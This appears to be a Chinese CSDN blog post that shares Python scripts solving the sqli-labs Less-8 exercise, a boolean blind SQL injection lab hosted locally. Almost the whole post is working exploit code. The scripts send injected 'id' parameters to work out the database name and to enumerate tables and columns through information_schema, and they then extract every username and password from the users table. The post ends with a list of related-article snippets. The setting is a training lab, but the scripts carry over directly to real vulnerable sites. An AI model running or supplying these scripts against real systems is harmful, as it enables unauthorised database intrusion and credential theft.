sql-lab less8 python脚本

最新推荐文章于 2024-07-20 17:45:06 发布
最新推荐文章于 2024-07-20 17:45:06 发布
阅读量45 收藏
点赞数
文章标签: sql python 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74092885/article/details/134222541
版权 
import requests


def decide():
    for i in range(10):
        response = requests.request('get',f"http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if(substr(length(length(database())), 1, 1)={i}, 1, 0)--+")
        if 'You are in...........' in response.text:
            return i


def ruler(size):
    result = ''
    for i in range(1, size + 1):
        for j in range(10):
            response = requests.request('get',f"http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if(substr(length(database()), {i}, 1)={j}, 1, 0)--+")
            if 'You are in...........' in response.text:
                result += str(j)
                break
    return int(result)
size = decide()
length = ruler(size)
#print(size)
#print(decide())
print(length)

得到数据库长度以及数据库的名称

速度比较慢

import requests
import string

url = 'http://127.0.0.1/sqli-labs-master/Less-8/'

i = 0
db_name_len = 0
print('[+]正在猜解数据库长度......')
while True:
    payload = url + "?id=1'and length(database())=%d--+" % i
    res = requests.get(payload)
    # print(payload)
    if 'You are in...........' in res.text:
        db_name_len = i
        print('数据库长度为:' + str(db_name_len))
        break
    if i == 30:
        print('error!')
        break
    i += 1

print("[+]正在猜解数据库名字......")
db_name = ''
for i in range(1, db_name_len + 1):
    # print(i)
    for k in string.ascii_lowercase:
        # print(k)
        payload = url + "?id=1'and substr(database(),%d,1)='%s'--+" % (i, k)
        res = requests.get(payload)
        # print(payload)
        if 'You are in...........' in res.text:
            db_name += k
            # print(db_name)
            break
print("数据库为: %s" % db_name)

# 猜解几张表
print("[+]正在猜解表的数量......")
tab_num = 0
while True:
    payload = url + "?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=%d--+" % tab_num
    res = requests.get(payload)
    if 'You are in...........' in res.text:
        print("%s数据库共有" % db_name + str(tab_num) + "张表")
        break
    else:
        tab_num += 1

print("[+]开始猜解表名......")
for i in range(1, tab_num + 1):
    tab_len = 0
    while True:
        payload = url + "?id=1'and (select length(table_name) from information_schema.tables where table_schema='security' limit %d,1)=%d--+" % (
        i - 1, tab_len)
        res = requests.get(payload)
        # print(payload)
        if 'You are in...........' in res.text:
            # print ('第%d张表长度为:'%i+str(tab_len))
            break
        if tab_len == 30:
            print('error!')
            break
        tab_len += 1
    tab_name = ''
    for j in range(1, tab_len + 1):
        for m in string.ascii_lowercase:
            payload = url + "?id=1'and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'--+" % (
            i - 1, j, m)
            res = requests.get(payload)
            if 'You are in...........' in res.text:
                tab_name += m
                # print (tab_name)
    print("[-]第%d张表名为: %s" % (i, tab_name))
    # 尝试猜解表下字段......
    dump_num = 0
    while True:
        payload = url + "?id=1'and (select count(column_name) from information_schema.columns where table_name='%s')=%d--+" % (
        tab_name, dump_num)
        res = requests.get(payload)
        if 'You are in...........' in res.text:
            print("%s表下有%d个字段" % (tab_name, dump_num))
            break
        dump_num += 1

    for a in range(1, dump_num + 1):
        dump_len = 0
        while True:
            payload = url + "?id=1'and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d--+" % (
            tab_name, a - 1, dump_len)
            res = requests.get(payload)
            # print(payload)
            if 'You are in...........' in res.text:
                # print("第%d个字段长度为%d"%(a,dump_len))
                break
            dump_len += 1
            if dump_len == 30:
                print("error!!")
                break
        dump_name = ''
        for i in range(1, dump_len + 1):
            for j in (string.ascii_lowercase + '_-'):
                payload = url + "?id=1'and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s'--+" % (
                tab_name, a - 1, i, j)
                res = requests.get(payload)
                if 'You are in...........' in res.text:
                    dump_name += j
                    # print(dump_name)
                    break
        print(dump_name)
print("[+]开始猜解users表下的username......")
usn_num = 0
char = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-"
while True:
    payload = url + "?id=1'and (select count(username) from security.users)=%d--+" % usn_num
    res = requests.get(payload)
    if "You are in" in res.text:
        # print(usn_num)#13
        break
    usn_num += 1
for i in range(1, usn_num + 1):
    usn_len = 0
    while True:
        payload = url + "?id=1'and (select length(username) from security.users limit %d,1)=%d--+" % (i - 1, usn_len)
        res = requests.get(payload)
        if "You are in" in res.text:
            # print("第%d的长度为%d"%(i,usn_len))
            break
        usn_len += 1
    usr_name = ''
    for k in range(1, usn_len + 1):
        for m in char:
            payload = url + "?id=1'and substr((select username from security.users limit %d,1),%d,1)='%s'--+" % (
            i - 1, k, m)
            res = requests.get(payload)
            if "You are in" in res.text:
                usr_name += m
                break
    print(usr_name)

print("[+]开始猜解users表下的password......")
usn_num = 0
char = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-@!"
while True:
    payload = url + "?id=1'and (select count(password) from security.users)=%d--+" % usn_num
    res = requests.get(payload)
    if "You are in" in res.text:
        # print(usn_num)#13
        break
    usn_num += 1
for i in range(1, usn_num + 1):
    usn_len = 0
    while True:
        payload = url + "?id=1'and (select length(password) from security.users limit %d,1)=%d--+" % (i - 1, usn_len)
        res = requests.get(payload)
        if "You are in" in res.text:
            # print("第%d的长度为%d"%(i,usn_len))
            break
        usn_len += 1
    usr_name = ''
    for k in range(1, usn_len + 1):
        for m in char:
            payload = url + "?id=1'and substr((select password from security.users limit %d,1),%d,1)='%s'--+" % (
            i - 1, k, m)
            res = requests.get(payload)
            if "You are in" in res.text:
                usr_name += m
                break
    print(usr_name)

南去良鱼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql-labs第八关python脚本
西部壮仔的博客
03-22 1047
sql bool盲注 代码如下: # 1. 设置全局变量DIS 和list用于控制详细信息的显示以及定义需要爆破的ASCII码 # 2. 爆破当前数据库长度 # 3. 定义数据库长度爆破函数Brute_length() # 4. 爆破当前数据库名称 # 5. 定义数据库名爆破函数Brute_database() # 6. 爆破所有数据库长度 # 7. 爆破所有数据库名称 # 8. 爆破表名 # 9...
sql-lib Less-9 python实现
weixin_43745072的博客
11-22 303
转载请注明出处 Less-9 Less-9是一个盲注的,因为无论注入正确与否,返回的信息都是相同的。那么参考下Less-9的题目,我们可以看到,考虑基于时间的盲注。其原理主要是使用if函数,对字符串特定位置判断,为真就不操作,反之sleep(5) 首先查询表名。这里通过改变substr中下一个字符的值"`1",以及对应的字符的值125。如果if判断的条件为真,那么就是字符匹配,就沉睡5s反之直接执行下一个字符匹配。 1' union select 1,If(ascii(substr(databa
sqli-lab简单python实现通关
Williu的博客
01-04 3349
刚开始学习sql注入的菜鸟,简单写下自己的理解,sql注入,肯定和数据库有关系了。利用sql语句来实现对数据库的入侵并获取数据或者破坏。 简单来说就是,利用sql语句来实现欺骗服务器,达到自己的目的。 比如: 我们要登录,需要输入用户名个和密码,然后后台数据库就会select SELECT * FROM users WHERE username = '张三' AND password = '123456' 然后我们改变他的查询方式,利用#或许–注释符 select * from users where u
sql盲注python脚本
weixin_48266255的博客
08-29 452
【代码】sql盲注python脚本
jupyterlab-sql:JupyterLabSQL GUI
01-30
jupyterlab-sql仅适用于Python 3.5及更高版本。 JupyterLab传统 要在JupyterLab 1.0之前的版本上安装jupyterlab-sql,请运行: pip install jupyterlab_sql==0.2.1 jupyter serverextension enable jupyterlab_sql...
sql结果还原为sql语句 python脚本
09-12
本文将深入探讨如何使用Python脚本来将SQL执行的结果转换回原始的SQL语句,这对于数据备份、数据分析以及数据库维护具有重要意义。标题中的"sql结果还原为sql语句 python脚本"指的就是这一过程,它涉及到Python编程...
sql-metadata:使用python-sqlparse返回的标记化查询并生成查询元数据
01-28
sql元数据 使用返回的标记化查询并生成查询元数据。 提取查询使用的列名和表。 提供用于标准化SQL查询和表别名解析的帮助器。 支持的查询语法: MySQL PostgreSQL 用法 pip install sql_metadata >> > import ...
SQL-Lab:包含用于从头开始设置SQL Server Lab Environment的脚本
03-21
这个压缩包文件"SQL-Lab-master"包含了所有必要的资源和脚本,帮助用户通过PowerShell自动化完成实验室环境的搭建。 首先,我们要理解PowerShell是一种强大的命令行接口和脚本语言,尤其适用于系统管理员和开发者,...
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名...
PostgreSQL 中如何解决因大量并发删除和插入操作导致的索引抖动?
技术笔记
07-17 840
索引抖动是 PostgreSQL 中一个常见的问题,它会对数据库的性能产生严重的影响。通过采用批量操作、分区表、索引优化和调整数据库参数等方法,我们可以有效地解决索引抖动问题,提高数据库的性能和稳定性。在实际应用中,我们应该根据具体情况选择合适的解决方案,并不断地进行优化和调整,以满足业务的需求。解决索引抖动问题就像是一场战斗,我们需要根据敌人(问题)的特点和弱点,选择合适的武器(解决方案),并灵活运用战术(优化方法),才能取得最终的胜利。
多租户架构的艺术:在SQL Server中实现数据库的多租户
2401_85762266的博客
07-20 334
多租户架构允许多个租户共享相同的应用程序和数据库架构,每个租户的数据被逻辑上隔离。这种架构的优势在于成本效益和可扩展性,但同时也带来了数据隔离、性能和安全性的挑战。
接口开发:Orcal数据库的批量新增sql
qq_65032048的博客
07-17 771
场景:在日常的CURD中一定会用到批量新增。在我们的项目中,使用的数据库是Orcal,由于之前基本都是使用Mysql的,使用的sql语句也基本都是用mysql的。但是在这次的接口编写时用mysql的批量新增出了问题,刚开始我还以为是写的动态sql有问题,在后续的问题修改也主要是对动态sql修改,因此也浪费了大量的时间,在后续把sql搬到数据库运行一下后才发现是sql的问题,同时也了解到了mysql和orcal 也是有很多地方是不同的。
SQL执行流程、SQL执行计划、SQL优化
风中的默默
07-19 211
返回两个表中的匹配行。返回左表中的所有记录以及右表中的匹配记录。返回右表中的所有记录以及左表中的匹配记录。返回左侧或右侧表中有匹配的所有记录。
SQL每日一题:查找重复的电子邮箱
xiongxiaoxuan的博客
07-17 358
编写解决方案来报告所有重复的电子邮件。请注意,可以保证电子邮件字段不为 NULL。以 任意顺序 返回结果表。按照email分组计数,筛选出数量>1的email。(需注意分组计数时一定要记得用group by)此表的每一行都包含一封电子邮件。电子邮件不包含大写字母。id 是该表的主键(具有唯一值的列)。
SQL Server详细使用教程(包含启动SQL server服务、建立数据库、建表的详细操作) 非常适合初学者
hackeroink的博客
07-15 1116
本文主要详细介绍SQL server2019的简单使用,以《数据库系统概论(第5版)》的第79页—第80页为例,详细介绍如何使用SQL server2019这款数据库软件,包括启动SQL server服务,建立数据库(学生—课程模式S-T),建立课程表等,内容比较简单,容易理解,适合广大初学者了解SQL server的简单使用。不会涉及到复杂的语法知识,如果有也会详细解释的!下文标红的字请重点关注一下!本文的需要建表的数据如下:2.Course课程号Cno课程名Cname先行课Cpno学分。
SQL Server报告服务的艺术:在SSRS中打造专业报告
最新发布
2401_85760095的博客
07-20 567
SQL Server Reporting Services是一个全面的报告解决方案,它允许从各种数据源生成复杂的交互式和移动友好的报告。SSRS包括一个集成的开发环境,用于设计报告,以及一个部署环境,用于发布和共享报告。
怎样在 PostgreSQL 中实现数据的异地备份?
技术笔记
07-19 895
总而言之,在 PostgreSQL 中实现数据的异地备份不是一件难事,但也需要我们认真对待,精心规划。选择合适的备份方法和异地存储方式,制定合理的备份策略,定期进行测试和恢复演练,才能确保我们的数据在任何情况下都能“安然无恙”。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
【PostgreSQL】Windows 上安装 PostgreSQL 16版本
No8g攻城狮的博客
07-17 1095
✌全网粉丝20W+,CSDN博客专家、Java领域优质创作者,掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域✌。
tomcat sql-lab
07-27
对于Tomcat和SQL-Lab的问题,我可以为您提供一些基本信息。 Tomcat是一个开源的Java Servlet容器,用于在服务器上运行Java Web应用程序。它是Apache软件基金会的一个项目,提供了一个可靠和高性能的Web服务器环境。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值